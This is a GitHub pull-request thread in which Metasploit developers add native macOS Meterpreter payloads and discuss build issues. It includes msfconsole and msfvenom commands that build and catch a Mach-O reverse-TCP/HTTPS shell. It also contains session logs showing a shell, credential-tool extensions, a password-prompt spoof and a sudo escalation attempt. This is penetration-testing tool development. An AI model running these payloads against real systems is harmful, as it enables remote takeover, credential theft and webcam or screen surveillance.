OSX meterpreter

[timwr]

I thought I'd PR this up early even though it's not quite ready to land, feel free to close this. It was straightforward to build mettle on OSX on OSX itself (i.e, without cross compiling). Full credit to @acammack-r7 and @busterb
We'll need to update the gem to include the x86_64-apple-darwin TARGET.
Until then if you cd to the mettle directory it will be picked up automatically.

1. Land update README.md for building on OSX mettle#80
2. make TARGET=x86_64-apple-darwin
3. Start a handler: msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
4. Generate a macho: msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out
5. Run it :)

• I should probably have used the generate_mettle_payloads.rb tool.
• This is only stageless. We could probably use this: https://github.com/CylanceVulnResearch/osx_runbin for staging if @parchedmind is happy
• screenshot, clipboard and webcam_snap should work :)

[cbrnrd]

Testing (El Capitan 10.11.8 i386)

meterpreter > shell
Process 37363 created.
Channel 1 created.
/bin/sh: line 0: fg: no job control

[-] core_channel_write: Operation failed: 9
meterpreter > load -l
espia.x64
espia.x86
extapi.x64
extapi.x86
incognito.x64
incognito.x86
kiwi.x64
kiwi.x86
lanattacks.x64
lanattacks.x86
mimikatz.x64
mimikatz.x86
powershell.x64
powershell.x86
priv.x64
priv.x86
python.x64
python.x86
sniffer.x64
sniffer.x86
stdapi
stdapi.x64
stdapi.x86
winpmem.x86
meterpreter > load powershell.x86
Loading extension powershell.x86...
[-] Failed to load extension: No module of the name ext_server_powershell.x86. found
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use osx/gather/password_prompt_spoof
msf post(password_prompt_spoof) > set SESSION 1
SESSION => 1
msf post(password_prompt_spoof) > run

[*] Running module against Carters-MacBook-Air-2.local

^C[-] Post interrupted by the console user     <---- didn't work
[*] Post module execution completed
msf post(password_prompt_spoof) > use multi/manage/sudo
msf post(sudo) > options

Module options (post/multi/manage/sudo):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password to use when running sudo.
   SESSION                    yes       The session to run this module on.

msf post(sudo) > set PASSWORD <sudopass>
PASSWORD => <sudopass>
msf post(sudo) > set SESSION 1
SESSION => 1
msf post(sudo) > run

[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] Sudoing with password `<sudopass>'.
[-] SUDO: Didn't work out, still a mere user.
[*] Post module execution completed
msf post(sudo) > 

I doubt that the windows extensions are meant to be loaded. Also, a lot of post modules seem to be hanging (at least for a long time).

[sempervictus]

@timwr: how does one build the mettle payload for x86_64-apple-darwin without xcode? Without the binary in the payload gem, framework won't load with a failure in the generate call. :(

[timwr]

@sempervictus please see rapid7/mettle#80. You can only build on OSX (with xcode) unfortunately.
@cbrnrd I only tested with x86_64, let me see if I can reproduce

[sempervictus]

@timwr: shouldn't that be a blocking change? Some of us run Linux :). Any way around xcode via the cross compiler chain? Are there any legal constraints imposed by xcode on the product for us to be worried about? If everyone cant all build their own, this will get caught very quickly - the static binary provided by r7 will be signed for and soon as network, disk, or other filters see it, we'll be in trouble.

[timwr]

I run Linux too, I'm able to run OSX within VirtualBox on a Ubuntu host.
However: I've been struggling to find a way to cross compile for OSX from Linux.
With an OSX build machine you can cross compile for Linux, for Windows and for OSX itself, so I think it's the only option, but I'd love to be proven wrong.

[sempervictus]

Hmm, must be some technical method around this, especially since both virtualizing Apple OS and using their toolchain carry potential legal ramifications. Pulled out an older imac, hoping to have a build up in a bit :)

IIRC @AnwarMohamed had OSX binaries building with the old Bionic sources. Might merit a look...

[timwr]

I'm pretty sure this: https://github.com/AnwarMohamed/meterpreter-darwin/ is meant to be built with OSX, not Linux.
I've updated rapid7/mettle#80 to fix make TARGET=i386-apple-darwin

[timwr]

@cbrnrd thanks for your testing! I've fixed the shell command now and added support for i386.
I'm not sure password_prompt_spoof is working (even with python meterpreter). I foolishly re-implemented it here: master...timwr:osx_password_prompt before I knew it existed :(

[timwr]

meterpreter> shell is fixed now, but there are still issues with cmd_exec

[cbrnrd]

@timwr @sempervictus this may work for a cross compiler, i haven't tested it but it looks promising

[busterb]

We have a real licensed Mac that we're doing internal builds for this with. It'll soon be incorporated into the ruby gem.

[acammack-r7]

To prevent weird bugs in the future, this also needs to check for the 32-bit magic (\xCE\xFA\xED\xFE), the big-endian versions of the 32-bit and 64-bit magics, and the fat-binary magic (\xCA\xFE\xBA\xBE).

[timwr]

great spot! thanks @acammack-r7

[sempervictus]

@cbrnrd : thank you, that does look quite promising.
@bcook-r7: whats the integration and maintenacne PITA factor with that cross osx chain? It seems highly preferable not to require people to have a closed source compiler to build payloads of all things - the stuff we leave behind (if we're not careful). From a paranoia point of view, for all we know it'll embed clearly identifiable build information somewhere in the binary. Their licensing agreements are known to be rather predatory, and we're explicitly working to build stuff which circumvents their security model, which as i understand it, would violate their TOS (at least for iOS, not sure about xcode in general). The whole point of being platform independent is platform independence, right? :)

Are there any sample builds available right now? Getting this to work on OSX 10.9.5 is... problematic. In the very least we'd have to have good docs for a number of OS revisions since even some of the framework libraries are different (QuartzCore is needed in older versions in Makefile.common instead of CoreImage, the older compilers fail to build the deps, gcc doesnt install to the right places with brew, its just a bloody mess).

[busterb]

We're not using a closed-source compiler (it's clang), but I did get mettle to work fine on 10.8 through 10.12. Almost done with the build infrastructure to support it (mettle needs one more PR for this)

[OJ]

When this lands I absolutely intend on following up on Metlstorm's request to build a module that will allow you to mess with the latest Macbook's Touch Bar.

[busterb]

I wasn't able to get 32-bit builds running, but did modify this PR to use the new mettle template generator, and so http/s also works:

$ ./msfvenom -p osx/x64/meterpreter_reverse_https -f macho -o test.macho lhost=127.0.0.1
No platform was selected, choosing Msf::Module::Platform::OSX from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 618316 bytes
Final size of macho file: 618316 bytes
Saved as: test.macho

[cbrnrd]

@busterb with your changes, is it still showing the windows plugins with load -l?

[busterb]

Post modules hanging is fixed in another PR I'm about to submit. I honestly didn't notice the extension issue, but will address that too.

[cbrnrd]

Alright, let me know if i can help :)

[busterb]

Added cc31689 which fixed the template generator. Also removed i386 support for now, because our builder VM still has trouble with it AFAIK (ping @jmartin-r7 )

[busterb]

Release Notes

Initial support for native-code Meterpreter on macOS/OSX targets has been added. The screenshot, clipboard, and webcam_snap functionalities work from OS X 10.8 through 10.12 on x86_64 targets. The Mettle payloads gem also includes iOS and Windows binaries.

[timwr]

@cbrnrd the load -l list is not working but you can still do load extapi to see the clipboard commands. I wonder if it's worth enabling this automatically (we do this for Android for the android commands).

[jaketblank]

Got some cool additions here if any of you guys are interested: #9196 - made some changes to the webcam_stream player and added a new screenshare command